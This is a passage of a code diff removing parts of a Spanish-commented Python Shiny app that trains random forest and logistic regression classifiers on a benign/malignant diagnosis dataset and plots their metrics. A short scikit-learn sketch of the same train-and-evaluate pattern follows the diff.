n_estimators)): - plt.figure(figsize=(12,12)) - m_tree = plot_tree(model.estimators_[index], filled=True, feature_names=predictors, class_names=["Benign", "Malign"], rounded=True, fontsize=5) - plt.savefig( str(ranForest_image_folder) + "\\" + str(session.id) + '_ran_forest' + str(index) + '.jpg',format='jpg',bbox_inches = "tight", dpi=600) - # Cerrar todas las figuras para evitar llenar la memoria de información innecesaria - plt.close('all') - - # Guardado de datos de la figura del árbol de decisión - coords = list() - coords_x = list() - coords_y = list() - texts = list() - - for node in m_tree: - coords.append(list(node.get_position())) - # Arreglo del problema generado por boostrap sampling en los random forest: - new_texts = node.get_text().split("\n") - first_value = 0 - second_value = 0 - value_index = 0 - for idx, string in enumerate(new_texts): - values_split = re.split('(\d+)', string) - if len(values_split) > 0 and values_split[0] == 'value = [': - first_value = int(values_split[1]) - second_value = int(values_split[3]) - value_index = idx - - if value_index != 0: - new_texts[value_index - 1] = 'samples = ' + str(first_value + second_value) - - final_string = '
      '.join(new_texts) - - texts.append(final_string) - - for x, y in coords: - coords_x.append(x) - coords_y.append(y) - - coords_x_list.append(coords_x) - coords_y_list.append(coords_y) - texts_list.append(texts) - - ranForest_tree_plot_x_coords.set(coords_x_list) - ranForest_tree_plot_y_coords.set(coords_y_list) - ranForest_tree_plot_texts.set(texts_list) - - random_forest_last_estimators_num.set(n_estimators) - -#################################### EFECTOS REACTIVOS ####################################### - - # GENERAR EL MODELO DE RANDOM FOREST Y REALIZAR TODOS LOS CÁLCULOS - @reactive.Effect - @reactive.event(input.generate_random_forest) - def _(): - ui.remove_ui("#ran-forest-warning") - - # Obtener el tamaño de la separación de entrenamiento y la longitud de la base de datos para comprobaciones: - test_size_split = input.test_split_value() - df_len = len(clean_df) - - # Comprobaciones previas. Si algo falla, el modelo no se calcula y se resetean los resultados anteriores para no causar confusión: - if ran_forest_previous_checks(test_size_split, df_len) == True: - # Cerrar todas las visualizaciones - ui.update_switch("view_variable_importance_ran_forest", value=False) - ui.update_switch("conf_mat_ran_forest_switch", value=False) - ui.update_switch("view_tree_ran_forest_switch", value=False) - # Resetear todos los resultados - reset_ran_forest_result_values() - empty_ran_forest_feature_importance_df() - random_forest_last_estimators_num.set(0) - random_forest_execution_counter.set(0) - return - - # Arreglar valores None para poder ser aceptados por el modelo: - max_depth_val = input.ran_forest_max_depth() - if max_depth_val == 0: - max_depth_val = None - - max_features_value = input.ran_forest_max_features() - if max_features_value == 'None': - max_features_value = None - - n_estimators_ran_forest = input.ran_forest_n_estimators() - - # Crear el modelo de random forest - ran_forest_model = RandomForestClassifier(n_estimators=n_estimators_ran_forest, - criterion=input.ran_forest_criterion(), - max_depth=max_depth_val, - min_samples_split=input.ran_forest_min_samples_split(), - min_samples_leaf=input.ran_forest_min_samples_leaf(), - max_features=max_features_value) - # bootstrap=False # Boostrap sampling causa problemas al representar los árboles, su número de samples no - # corresponde a la suma de los valores de cada tipo. Sin embargo, si se desactiva, todos los árboles generados - # son exactamente iguales. - - # Lista de las características que usamos: - features_list = list(input.ran_forest_features_sel()) - - # Fit y predicciónes del modelo. 
Guardado de todos los datos - classification_model_random_forest(ran_forest_model,clean_df,test_size_split,features_list,outcome_var,n_estimators_ran_forest) - - # Variables importantes y guardado de sus resultados - empty_ran_forest_feature_importance_df() - ran_forest_feat_imp = pd.Series(ran_forest_model.feature_importances_, index=features_list).sort_values(ascending=False) - ran_forest_feat_imp_df.insert(0, "Característica", ran_forest_feat_imp.index) - ran_forest_feat_imp_df.insert(1, "Valor", ran_forest_feat_imp.values.round(decimals=3) * 100) - - random_forest_execution_counter.set(random_forest_execution_counter.get()+1) - - # MOSTRAR EL WIDGET DE IMPORTANCIA DE VARIABLES DEL RANDOM FOREST - @reactive.Effect - def _(): - var_imp_ran_forest_switch = input.view_variable_importance_ran_forest() - if var_imp_ran_forest_switch == True: - ui.remove_ui("#var-imp-ran-forest-plot") - if random_forest_execution_counter.get() > 0: - var_imp_ran_forest_plot = output_widget("widget_ran_forest_var_imp") - ui.insert_ui( - ui.div({"id": "var-imp-ran-forest-plot"}, var_imp_ran_forest_plot, style = "width:100%; overflow-x:auto; overflow-y:auto;"), - selector="#var_imp_ran_forest", - where="beforeEnd", - ) - else: - ui.insert_ui( - ui.div({"id": "var-imp-ran-forest-plot"}, feat_imp_warning_ui("ran_forest_warnings")), - selector="#var_imp_ran_forest", - where="beforeEnd", - ) - else: - ui.remove_ui("#var-imp-ran-forest-plot") - - # DESELECCIONAR VARIABLES POCO IMPORTANTES DEL RANDOM FOREST - @reactive.Effect - @reactive.event(input.deselect_not_imp_vars_ran_forest) - def _(): - minimum_importance = input.minimum_importance_ran_forest() - important_columns_auto = [feature["Característica"] for idx, feature in ran_forest_feat_imp_df.iterrows() if (feature["Valor"] >= minimum_importance)] - ui.update_checkbox_group("ran_forest_features_sel", selected=important_columns_auto) - - # MOSTRAR LA MATRIZ DE CONFUSIÓN DEL RANDOM FOREST - @reactive.Effect - def _(): - conf_mat_ran_forest_switch = input.conf_mat_ran_forest_switch() - if conf_mat_ran_forest_switch == True: - ui.remove_ui("#ran-forest-conf-mat-train") - ui.remove_ui("#ran-forest-conf-mat-test") - if random_forest_execution_counter.get() > 0: - ran_forest_conf_mat_train = output_widget("widget_ran_forest_conf_mat_train") - ui.insert_ui( - ui.div({"id": "ran-forest-conf-mat-train"}, ran_forest_conf_mat_train, style = "width:100%; height:300px; overflow-x:auto; overflow-y:auto;"), - selector="#ran_forest_conf_matrix_train", - where="beforeEnd", - ) - ran_forest_conf_mat_test = output_widget("widget_ran_forest_conf_mat_test") - ui.insert_ui( - ui.div({"id": "ran-forest-conf-mat-test"}, ran_forest_conf_mat_test, style = "width:100%; height:300px; overflow-x:auto; overflow-y:auto;"), - selector="#ran_forest_conf_matrix_test", - where="beforeEnd", - ) - else: - ui.insert_ui( - ui.div({"id": "ran-forest-conf-mat-train"}, conf_matrix_warning_ui("ran_forest_warnings")), - selector="#ran_forest_conf_matrix", - where="beforeEnd", - ) - else: - ui.remove_ui("#ran-forest-conf-mat-train") - ui.remove_ui("#ran-forest-conf-mat-test") - - # MOSTRAR EL WIDGET DEL RANDOM FOREST - @reactive.Effect - def _(): - view_tree_ran_forest_switch = input.view_tree_ran_forest_switch() - if view_tree_ran_forest_switch == True: - ui.remove_ui("#ran-forest-view-img") - ui.remove_ui("#ran-forest-view-img-foot") - if random_forest_execution_counter.get() > 0: - ran_forest_view = output_widget("widget_ran_forest_view") - ui.insert_ui( - ui.div({"id": "ran-forest-view-img"}, 
ran_forest_view, style = "width:100%; height:1000px; overflow-x:auto; overflow-y:auto;"), - selector="#ran_forest_view", - where="beforeEnd", - ) - ran_forest_view_foot = ui.output_text("random_forest_view_foot_txt") - ui.insert_ui( - ui.div({"id": "ran-forest-view-img-foot"}, ran_forest_view_foot, style="color:grey; font-style:italic; text-align:center; font-size: 0.7em;"), - selector="#ran_forest_view", - where="beforeEnd", - ) - - else: - view_tree_ran_forest_warning = ui.output_text("random_forest_warning_view_txt"), - ui.insert_ui( - ui.div({"id": "ran-forest-view-img"}, view_tree_ran_forest_warning, style="color:red; font-style:italic; margin-top:20px; padding: 10px; background: #f7f7f7; border-radius: 10px;"), - selector="#ran_forest_view", - where="beforeEnd", - ) - else: - ui.remove_ui("#ran-forest-view-img") - ui.remove_ui("#ran-forest-view-img-foot") - - # ACTUALIZAR EL SELECTOR DE ÁRBOL DE DECISIÓN PARA MOSTRAR - @reactive.Effect - def _(): - n_estimators = random_forest_last_estimators_num.get() - new_list = list() - for index in range(0, min(5, n_estimators)): - new_list.append(index) - ui.update_select("view_tree_ran_forest_number", choices=new_list) - -#################################### WIDGETS ################################################# - - # WIDGET DE LA IMPORTANCIA DE LAS VARIABLES DEL RANDOM FOREST - @output - @render_widget - def widget_ran_forest_var_imp(): - #Variables a las que reaccionar: - random_forest_execution_counter.get() - input.view_variable_importance_ran_forest() - - if len(ran_forest_feat_imp_df) == 0: - return go.Figure() - - fig = go.Figure(data=[go.Bar(x = ran_forest_feat_imp_df["Valor"], - y = ran_forest_feat_imp_df["Característica"], - orientation='h', - name="", - marker=dict(color = ran_forest_feat_imp_df["Valor"], - colorscale=px.colors.sequential.Viridis_r)) - ]) - - fig.update_layout(autosize=True, - height=max(280, 40*len(ran_forest_feat_imp_df)), - margin=dict(l=20, r=20, t=40, b=20),) - - fig = fig.update_traces(hovertemplate='%{y} : %{x}%') - - fig.update_yaxes(autorange="reversed") - - return fig - - # WIDGET MATRIZ DE CONFUSIÓN ENTRENAMIENTO DEL RANDOM FOREST - @output - @render_widget - def widget_ran_forest_conf_mat_train(): - cm_map = ranForest_tree_conf_mat_train.get() - fig = go.Figure(data=[go.Heatmap(z=cm_map, - xgap = 1, - ygap = 1, - colorscale=px.colors.sequential.Teal, - name="") - ]) - - fig.update_xaxes( - autorange="reversed", - ) - - fig.update_layout(title="Matriz de confusión: datos entrenamiento", - xaxis_title="Valores reales", - yaxis_title="Valores predichos", - xaxis = dict( - tickmode = 'array', - tickvals = [0, 1], - ticktext = ['0', '1'] - ), - yaxis = dict( - scaleanchor = 'x', - tickmode = 'array', - tickvals = [0, 1], - ticktext = ['0', '1'] - ), - autosize=True, - height=300, - width=400, - margin=dict(l=20, r=20, t=40, b=20),) - - fig = fig.update_traces(text=cm_map, - texttemplate="%{text}", - hovertemplate='Valor real: %{x}
      Valor predicho: %{y}
      Cantidad: %{z}') - - return fig - - # WIDGET MATRIZ DE CONFUSIÓN TESTING DEL RANDOM FOREST - @output - @render_widget - def widget_ran_forest_conf_mat_test(): - cm_map = ranForest_tree_conf_mat_test.get() - fig = go.Figure(data=[go.Heatmap(z=cm_map, - xgap = 1, - ygap = 1, - colorscale=px.colors.sequential.Teal, - name="") - ]) - - fig.update_xaxes( - autorange="reversed", - ) - - fig.update_layout(title="Matriz de confusión: datos test", - xaxis_title="Valores reales", - yaxis_title="Valores predichos", - xaxis = dict( - tickmode = 'array', - tickvals = [0, 1], - ticktext = ['0', '1'] - ), - yaxis = dict( - scaleanchor = 'x', - tickmode = 'array', - tickvals = [0, 1], - ticktext = ['0', '1'] - ), - autosize=True, - height=300, - width=400, - margin=dict(l=20, r=20, t=40, b=20),) - - fig = fig.update_traces(text=cm_map, - texttemplate="%{text}", - hovertemplate='Valor real: %{x}
      Valor predicho: %{y}
      Cantidad: %{z}') - - return fig - - # WIDGET VISUALIZACIÓN DEL RANDOM FOREST - @output - @render_widget - def widget_ran_forest_view(): - # Variables a las que reaccionar: - random_forest_execution_counter.get() - - num_tree = int(input.view_tree_ran_forest_number()) - - img_path = str(Path(__file__).parent / "RanForests") + "\\" + str(session.id) + '_ran_forest' + str(num_tree) + '.jpg' - img_src = Image.open( img_path ) - - fig = go.Figure() - - fig.add_trace( - go.Scatter( - x=ranForest_tree_plot_x_coords.get()[num_tree], - y=ranForest_tree_plot_y_coords.get()[num_tree], - text=ranForest_tree_plot_texts.get()[num_tree], - mode="markers", - marker=dict( - color="white", - size=60, - opacity=0.1, - ), - name="", - ) - ) - - # Configurar ejes - fig.update_xaxes( - visible=False, - range=[0,1], - ) - - fig.update_yaxes( - visible=False, - range=[0,1], - # el atributo scaleanchor asegura que la relación de aspecto se mantiene constante - scaleanchor="x" - ) - - fig.add_layout_image( - dict( - x=-0.02, - sizex=1.04, - y=1.01, - sizey=1.02, - xref="x", - yref="y", - opacity=1.0, - layer="above", - sizing="stretch", - source=img_src) - ) - - fig = fig.update_traces(hovertemplate='%{text}') - - fig.update_layout(autosize=True, - height=1000, - margin=dict(l=20, r=20, t=40, b=20),) - - return fig - -#################################### TEXTOS ################################################## - - # RESULTADOS - @output - @render.text - def random_forest_accuracy(): - if accuracy_ranForest.get() == -1: - return "Exactitud: " - return "Exactitud: " + str(accuracy_ranForest.get()) + "%" - - @output - @render.text - def random_forest_recall(): - if recall_ranForest.get() == -1: - return "Sensibilidad o TVP: " - return "Sensibilidad o TVP: " + str(recall_ranForest.get()) + "%" - - @output - @render.text - def random_forest_precision(): - if precision_ranForest.get() == -1: - return "Precisión: " - return "Precisión: " + str(precision_ranForest.get()) + "%" - - @output - @render.text - def random_forest_f1(): - if f1_ranForest.get() == -1: - return "F1 Score: " - return "F1 Score: " + str(f1_ranForest.get()) + "%" - - @output - @render.text - def random_forest_accuracy_test(): - if accuracy_ranForest_test.get() == -1: - return "Exactitud: " - return "Exactitud: " + str(accuracy_ranForest_test.get()) + "%" - - @output - @render.text - def random_forest_recall_test(): - if recall_ranForest_test.get() == -1: - return "Sensibilidad o TVP: " - return "Sensibilidad o TVP: " + str(recall_ranForest_test.get()) + "%" - - @output - @render.text - def random_forest_precision_test(): - if precision_ranForest_test.get() == -1: - return "Precisión: " - return "Precisión: " + str(precision_ranForest_test.get()) + "%" - - @output - @render.text - def random_forest_f1_test(): - if f1_ranForest_test.get() == -1: - return "F1 Score: " - return "F1 Score: " + str(f1_ranForest_test.get()) + "%" - - - # WARNING VISUALIZACIÓN ÁRBOL - @output - @render.text - def random_forest_warning_view_txt(): - return "No se puede mostrar uno de los árboles de decisión sin haber creado el modelo!" - - @output - @render.text - def random_forest_view_foot_txt(): - return "Nota: Los valores de samples mostrados en la imagen son erroneos. En los bocadillos de información son correctos, son la suma de samples." 
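- # Editor's note: the hover texts for the forest's trees are rebuilt in classification_model_random_forest because,
- # with bootstrap sampling, the "samples" figure drawn by plot_tree does not match the sum of the per-class counts.
- # Worked example of the regex pass on one node label (the numbers are made up):
- #   re.split('(\d+)', 'value = [33, 21]')  ->  ['value = [', '33', ', ', '21', ']']
- # so the line just above it in the node text is rewritten to 'samples = 54' (33 + 21) before joining the hover text.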
- -#################################### UPDATES Y OTROS ######################################### - - # ACTUALIZAR CHECKBOX ÁRBOL DE DECISIÓN - def update_ranForest_checkbox_group(): - column_dict = {} - for col in clean_df.columns: - if col != "diagnosis": - column_dict[col] = col - ui.update_checkbox_group("ran_forest_features_sel", choices=column_dict, selected=list(column_dict)) - - -############################################################################################## -################################### REGRESIÓN LOGÍSTICA ###################################### -############################################################################################## - -#################################### IMPORTANTES ############################################# - - # COMPROBACIONES PREVIAS DE LA REGRESIÓN LOGÍSTICA - def log_reg_previous_checks(test_size_split, df_len): - if diagnosis_data_converted.get() == False: - ui.insert_ui( - ui.div({"id": "log-reg-warning"}, diagnosis_warning_ui("log_reg_warnings")), - selector="#log_reg_generator", - where="beforeEnd", - ) - return True - - if test_split_done.get() == False: - ui.insert_ui( - ui.div({"id": "log-reg-warning"}, test_split_warning_ui("log_reg_warnings")), - selector="#log_reg_generator", - where="beforeEnd", - ) - return True - - if len(list(input.log_reg_features_sel())) == 0: - ui.insert_ui( - ui.div({"id": "log-reg-warning"}, features_warning_ui("log_reg_warnings")), - selector="#log_reg_generator", - where="beforeEnd", - ) - return True - - if df_len * test_size_split < 1.0: - ui.insert_ui( - ui.div({"id": "log-reg-warning"}, test_split_low_warning_ui("log_reg_warnings")), - selector="#log_reg_generator", - where="beforeEnd", - ) - return True - - if df_len * ( 1 - test_size_split ) < 1.0: - ui.insert_ui( - ui.div({"id": "log-reg-warning"}, test_split_high_warning_ui("log_reg_warnings")), - selector="#log_reg_generator", - where="beforeEnd", - ) - return True - - return False - - # FIT, PREDICCIÓN Y GUARDADO DE DATOS DE LA REGRESIÓN LOGÍSTICA - def classification_model_log_reg(model, data, size_test, predictors, outcome, log_reg_max_iter): - # Crear la división de test y entrenamiento! 
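- # Editor's note (hedged suggestion, not in the original code): solvers such as lbfgs or saga converge faster on
- # standardised features; the max-iterations warning below fires whenever model.n_iter_ reaches log_reg_max_iter.
- # A minimal sketch, fitted on the training split only to avoid leakage:
- #   from sklearn.preprocessing import StandardScaler
- #   scaler = StandardScaler().fit(data_train[predictors])
- #   data_train.loc[:, predictors] = scaler.transform(data_train[predictors])
- #   data_test.loc[:, predictors] = scaler.transform(data_test[predictors])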
- data_train, data_test = train_test_split(data, test_size = size_test) - - # Fit del modelo: - model.fit(data_train[predictors],data_train[outcome]) - - if log_reg_max_iter == model.n_iter_[0]: - logistic_regression_warning = ui.output_text("logistic_regression_warning_iters_txt"), - ui.insert_ui( - ui.div({"id": "log-reg-warning"}, logistic_regression_warning, style="color:orange; font-style:italic; margin-top:20px; padding: 10px; background: #f7f7f7; border-radius: 10px;"), - selector="#log_reg_generator", - where="beforeEnd", - ) - - # Hacer predicciones del set de entrenamiento: - predictions = model.predict(data_train[predictors]) - - # Setear los resultados del set de entrenamiento: - accuracy_logReg.set((metrics.accuracy_score(predictions,data_train[outcome]) * 100).round(decimals=3)) - recall_logReg.set((metrics.recall_score(predictions,data_train[outcome]) * 100).round(decimals=3)) - precision_logReg.set((metrics.precision_score(predictions,data_train[outcome]) * 100).round(decimals=3)) - f1_logReg.set((metrics.f1_score(predictions,data_train[outcome]) * 100).round(decimals=3)) - - # Hacer predicciones del set de test: - predictions_test = model.predict(data_test[predictors]) - - # Setear los resultados del set des test: - accuracy_logReg_test.set((metrics.accuracy_score(predictions_test,data_test[outcome]) * 100).round(decimals=3)) - recall_logReg_test.set((metrics.recall_score(predictions_test,data_test[outcome]) * 100).round(decimals=3)) - precision_logReg_test.set((metrics.precision_score(predictions_test,data_test[outcome]) * 100).round(decimals=3)) - f1_logReg_test.set((metrics.f1_score(predictions_test,data_test[outcome]) * 100).round(decimals=3)) - - # Creación y guardado de la matriz de confusión - cm_train = metrics.confusion_matrix(predictions,data_train[outcome]) - cm_test = metrics.confusion_matrix(predictions_test,data_test[outcome]) - logReg_conf_mat_train.set(cm_train) - logReg_conf_mat_test.set(cm_test) - -#################################### EFECTOS REACTIVOS ####################################### - - # GENERAR EL MODELO DE LA REGRESIÓN LOGÍSTICA Y REALIZAR TODOS LOS CÁLCULOS - @reactive.Effect - @reactive.event(input.generate_logistic_regression) - def _(): - ui.remove_ui("#log-reg-warning") - - # Obtener el tamaño de la separación de entrenamiento y la longitud de la base de datos para comprobaciones: - test_size_split = input.test_split_value() - df_len = len(clean_df) - - # Comprobaciones previas. 
Si algo falla, el modelo no se calcula y se resetean los resultados anteriores para no causar confusión: - if log_reg_previous_checks(test_size_split, df_len) == True: - # Cerrar todas las visualizaciones - ui.update_switch("view_variable_importance_log_reg", value=False) - ui.update_switch("conf_mat_log_reg_switch", value=False) - ui.update_switch("view_tree_log_reg_switch", value=False) - # Resetear todos los resultados - reset_log_reg_result_values() - empty_log_reg_feature_importance_df() - logistic_regression_execution_counter.set(0) - return - - # Arreglar valores None para poder ser aceptados por el modelo: - log_reg_penalty = input.log_reg_penalty() - if log_reg_penalty == 'None': - log_reg_penalty = None - - log_reg_tolerance = 1 * pow(10, input.log_reg_tol()) - - log_reg_max_iters = input.log_reg_max_iter() - - log_reg_l1_rat = None - if log_reg_penalty == "elasticnet": - log_reg_l1_rat = 0.5 - - # Crear el modelo de regresión logística - log_reg_model = LogisticRegression(penalty=log_reg_penalty, - tol=log_reg_tolerance, - C=input.log_reg_c(), - solver=input.log_reg_solver(), - max_iter=log_reg_max_iters, - l1_ratio=log_reg_l1_rat) - - # Lista de las características que usamos: - features_list = list(input.log_reg_features_sel()) - - # Fit y predicciónes del modelo. Guardado de todos los datos - classification_model_log_reg(log_reg_model,clean_df,test_size_split,features_list,outcome_var,log_reg_max_iters) - - # Variables importantes y guardado de sus resultados - empty_log_reg_feature_importance_df() - log_reg_feat_imp = pd.Series(np.abs(log_reg_model.coef_[0]), index=features_list).sort_values(ascending=False) - # La importancia de las variables en regresión logística no suman 1, lo cambiamos a porcentaje - sum_all_imp_values = log_reg_feat_imp.sum() - log_reg_feat_imp_df.insert(0, "Característica", log_reg_feat_imp.index) - log_reg_feat_imp_df.insert(1, "Valor", (log_reg_feat_imp.values / sum_all_imp_values).round(decimals=3) * 100) - - logistic_regression_execution_counter.set(logistic_regression_execution_counter.get()+1) - - # MOSTRAR EL WIDGET DE IMPORTANCIA DE VARIABLES DE LA REGRESIÓN LOGÍSTICA - @reactive.Effect - def _(): - var_imp_log_reg_switch = input.view_variable_importance_log_reg() - if var_imp_log_reg_switch == True: - ui.remove_ui("#var-imp-log-reg-plot") - if logistic_regression_execution_counter.get() > 0: - var_imp_log_reg_plot = output_widget("widget_log_reg_var_imp") - ui.insert_ui( - ui.div({"id": "var-imp-log-reg-plot"}, var_imp_log_reg_plot, style = "width:100%; overflow-x:auto; overflow-y:auto;"), - selector="#var_imp_log_reg", - where="beforeEnd", - ) - else: - ui.insert_ui( - ui.div({"id": "var-imp-log-reg-plot"}, feat_imp_warning_ui("log_reg_warnings")), - selector="#var_imp_log_reg", - where="beforeEnd", - ) - else: - ui.remove_ui("#var-imp-log-reg-plot") - - # DESELECCIONAR VARIABLES POCO IMPORTANTES DE LA REGRESIÓN LOGÍSTICA - @reactive.Effect - @reactive.event(input.deselect_not_imp_vars_log_reg) - def _(): - minimum_importance = input.minimum_importance_log_reg() - important_columns_auto = [feature["Característica"] for idx, feature in log_reg_feat_imp_df.iterrows() if (feature["Valor"] >= minimum_importance)] - ui.update_checkbox_group("log_reg_features_sel", selected=important_columns_auto) - - # MOSTRAR LA MATRIZ DE CONFUSIÓN DE LA REGRESIÓN LOGÍSTICA - @reactive.Effect - def _(): - conf_mat_log_reg_switch = input.conf_mat_log_reg_switch() - if conf_mat_log_reg_switch == True: - ui.remove_ui("#log-reg-conf-mat-train") - 
ui.remove_ui("#log-reg-conf-mat-test") - if logistic_regression_execution_counter.get() > 0: - log_reg_conf_mat_train = output_widget("widget_log_reg_conf_mat_train") - ui.insert_ui( - ui.div({"id": "log-reg-conf-mat-train"}, log_reg_conf_mat_train, style = "width:100%; height:300px; overflow-x:auto; overflow-y:auto;"), - selector="#log_reg_conf_matrix_train", - where="beforeEnd", - ) - log_reg_conf_mat_test = output_widget("widget_log_reg_conf_mat_test") - ui.insert_ui( - ui.div({"id": "log-reg-conf-mat-test"}, log_reg_conf_mat_test, style = "width:100%; height:300px; overflow-x:auto; overflow-y:auto;"), - selector="#log_reg_conf_matrix_test", - where="beforeEnd", - ) - else: - ui.insert_ui( - ui.div({"id": "log-reg-conf-mat-train"}, conf_matrix_warning_ui("log_reg_warnings")), - selector="#log_reg_conf_matrix", - where="beforeEnd", - ) - else: - ui.remove_ui("#log-reg-conf-mat-train") - ui.remove_ui("#log-reg-conf-mat-test") - - # ACTUALIZAR PENALTY SEGÚN SOLVER DE LA REGRESIÓN LOGÍSTICA - @reactive.Effect - def _(): - solver = input.log_reg_solver() - if solver == "saga": - ui.update_select("log_reg_penalty", choices={"elasticnet": "Elasticnet (L1 + L2)", "l1": "L1", "l2": "L2 (default)", "None": "None"}) - elif solver == "liblinear": - ui.update_select("log_reg_penalty", choices={"l1": "L1", "l2": "L2 (default)"}) - else: - ui.update_select("log_reg_penalty", choices={"l2": "L2 (default)", "None": "None"}) - -#################################### WIDGETS ################################################# - - # WIDGET DE LA IMPORTANCIA DE LAS VARIABLES DE LA REGRESIÓN LOGÍSTICA - @output - @render_widget - def widget_log_reg_var_imp(): - #Variables a las que reaccionar: - logistic_regression_execution_counter.get() - input.view_variable_importance_log_reg() - - if len(log_reg_feat_imp_df) == 0: - return go.Figure() - - fig = go.Figure(data=[go.Bar(x = log_reg_feat_imp_df["Valor"], - y = log_reg_feat_imp_df["Característica"], - orientation='h', - name="", - marker=dict(color = log_reg_feat_imp_df["Valor"], - colorscale=px.colors.sequential.Viridis_r)) - ]) - - fig.update_layout(autosize=True, - height=max(280, 40*len(log_reg_feat_imp_df)), - margin=dict(l=20, r=20, t=40, b=20),) - - fig = fig.update_traces(hovertemplate='%{y} : %{x}%') - - fig.update_yaxes(autorange="reversed") - - return fig - - # WIDGET MATRIZ DE CONFUSIÓN ENTRENAMIENTO DE LA REGRESIÓN LOGÍSTICA - @output - @render_widget - def widget_log_reg_conf_mat_train(): - cm_map = logReg_conf_mat_train.get() - fig = go.Figure(data=[go.Heatmap(z=cm_map, - xgap = 1, - ygap = 1, - colorscale=px.colors.sequential.Teal, - name="") - ]) - - fig.update_xaxes( - autorange="reversed", - ) - - fig.update_layout(title="Matriz de confusión: datos entrenamiento", - xaxis_title="Valores reales", - yaxis_title="Valores predichos", - xaxis = dict( - tickmode = 'array', - tickvals = [0, 1], - ticktext = ['0', '1'] - ), - yaxis = dict( - scaleanchor = 'x', - tickmode = 'array', - tickvals = [0, 1], - ticktext = ['0', '1'] - ), - autosize=True, - height=300, - width=400, - margin=dict(l=20, r=20, t=40, b=20),) - - fig = fig.update_traces(text=cm_map, - texttemplate="%{text}", - hovertemplate='Valor real: %{x}
      Valor predicho: %{y}
      Cantidad: %{z}') - - return fig - - # WIDGET MATRIZ DE CONFUSIÓN TESTING DE LA REGRESIÓN LOGÍSTICA - @output - @render_widget - def widget_log_reg_conf_mat_test(): - cm_map = logReg_conf_mat_test.get() - fig = go.Figure(data=[go.Heatmap(z=cm_map, - xgap = 1, - ygap = 1, - colorscale=px.colors.sequential.Teal, - name="") - ]) - - fig.update_xaxes( - autorange="reversed", - ) - - fig.update_layout(title="Matriz de confusión: datos test", - xaxis_title="Valores reales", - yaxis_title="Valores predichos", - xaxis = dict( - tickmode = 'array', - tickvals = [0, 1], - ticktext = ['0', '1'] - ), - yaxis = dict( - scaleanchor = 'x', - tickmode = 'array', - tickvals = [0, 1], - ticktext = ['0', '1'] - ), - autosize=True, - height=300, - width=400, - margin=dict(l=20, r=20, t=40, b=20),) - - fig = fig.update_traces(text=cm_map, - texttemplate="%{text}", - hovertemplate='Valor real: %{x}
      Valor predicho: %{y}
      Cantidad: %{z}') - - return fig - - -#################################### TEXTOS ################################################## - - # WARNINGS DE LA REGRESIÓN LOGÍSTICA - @output - @render.text - def logistic_regression_warning_iters_txt(): - return "El modelo ha parado porque ha llegado al máximo de iteraciones! Modifica los datos de entrada o aumenta el número máximo de iteraciones." - - # RESULTADOS DE LA REGRESIÓN LOGÍSTICA - @output - @render.text - def logistic_regression_accuracy(): - if accuracy_logReg.get() == -1: - return "Exactitud: " - return "Exactitud: " + str(accuracy_logReg.get()) + "%" - - @output - @render.text - def logistic_regression_recall(): - if recall_logReg.get() == -1: - return "Sensibilidad o TVP: " - return "Sensibilidad o TVP: " + str(recall_logReg.get()) + "%" - - @output - @render.text - def logistic_regression_precision(): - if precision_logReg.get() == -1: - return "Precisión: " - return "Precisión: " + str(precision_logReg.get()) + "%" - - @output - @render.text - def logistic_regression_f1(): - if f1_logReg.get() == -1: - return "F1 Score: " - return "F1 Score: " + str(f1_logReg.get()) + "%" - - @output - @render.text - def logistic_regression_accuracy_test(): - if accuracy_logReg_test.get() == -1: - return "Exactitud: " - return "Exactitud: " + str(accuracy_logReg_test.get()) + "%" - - @output - @render.text - def logistic_regression_recall_test(): - if recall_logReg_test.get() == -1: - return "Sensibilidad o TVP: " - return "Sensibilidad o TVP: " + str(recall_logReg_test.get()) + "%" - - @output - @render.text - def logistic_regression_precision_test(): - if precision_logReg_test.get() == -1: - return "Precisión: " - return "Precisión: " + str(precision_logReg_test.get()) + "%" - - @output - @render.text - def logistic_regression_f1_test(): - if f1_logReg_test.get() == -1: - return "F1 Score: " - return "F1 Score: " + str(f1_logReg_test.get()) + "%" - - # WARNING MATRIZ DE CONFUSIÓN DE LA REGRESIÓN LOGÍSTICA - @output - @render.text - def logistic_regression_warning_conf_matrix_txt(): - return "No se puede mostrar la matriz de confusión de la regresión logística sin haber creado el modelo!" 
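For reference, the train/test metric pipeline used by the logistic-regression code above can be reproduced outside the Shiny reactive context in a few lines of scikit-learn. The sketch below is illustrative only: the `make_classification` dataset, the split size and the hyperparameter values are placeholders, not the app's actual inputs, and scikit-learn's metric functions expect the true labels as the first argument.

# Minimal, self-contained sketch of the fit / predict / metric pattern shown above,
# using a synthetic binary dataset (placeholder data and hyperparameters).
from sklearn.datasets import make_classification
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LogisticRegression
from sklearn import metrics

X, y = make_classification(n_samples=500, n_features=10, random_state=0)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, random_state=0)

model = LogisticRegression(penalty="l2", C=1.0, solver="lbfgs", max_iter=1000)
model.fit(X_train, y_train)

for name, X_, y_ in (("train", X_train, y_train), ("test", X_test, y_test)):
    pred = model.predict(X_)
    # y_true goes first in scikit-learn metric functions
    print(name,
          "accuracy:", round(metrics.accuracy_score(y_, pred) * 100, 3),
          "recall:", round(metrics.recall_score(y_, pred) * 100, 3),
          "precision:", round(metrics.precision_score(y_, pred) * 100, 3),
          "F1:", round(metrics.f1_score(y_, pred) * 100, 3))
    print(metrics.confusion_matrix(y_, pred))
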
- -#################################### UPDATES Y OTROS ######################################### - - # ACTUALIZAR CHECKBOX DE LA REGRESIÓN LOGÍSTICA - def update_logReg_checkbox_group(): - column_dict = {} - for col in clean_df.columns: - if col != "diagnosis": - column_dict[col] = col - ui.update_checkbox_group("log_reg_features_sel", choices=column_dict, selected=list(column_dict)) - - -############################################################################################## -######################## RESETEAR CLEAN DATAFRAME Y ACCIONES GENERALES ####################### -############################################################################################## - - # RESETEO GENERAL - @reactive.Effect - @reactive.event(input.reset_clean_df) - def _(): - # Resetear la dataframe de datos limpios - reset_clean_df() - - # Vaciar las dataframes de importancia de variables - empty_all_feature_importance_df() - - # Actualizar y cerrar partes necesarias - update_all_selectors() - close_every_ui_after_reset() - - reset_dataframe_counter.set( reset_dataframe_counter.get() + 1 ) - diagnosis_data_converted.set(False) - correlation_execution_counter.set(0) - test_split_done.set(False) - - decision_tree_execution_counter.set(0) - random_forest_execution_counter.set(0) - logistic_regression_execution_counter.set(0) - reset_all_result_values() - - # RESETEAR CLEAN_DF - def reset_clean_df(): - # Vaciar la dataframe limpia - for columnName in clean_df.columns: - clean_df.drop(columnName, axis = 1, inplace=True) - clean_df.drop(clean_df.index, inplace=True) - - # Rellenar la dataframe 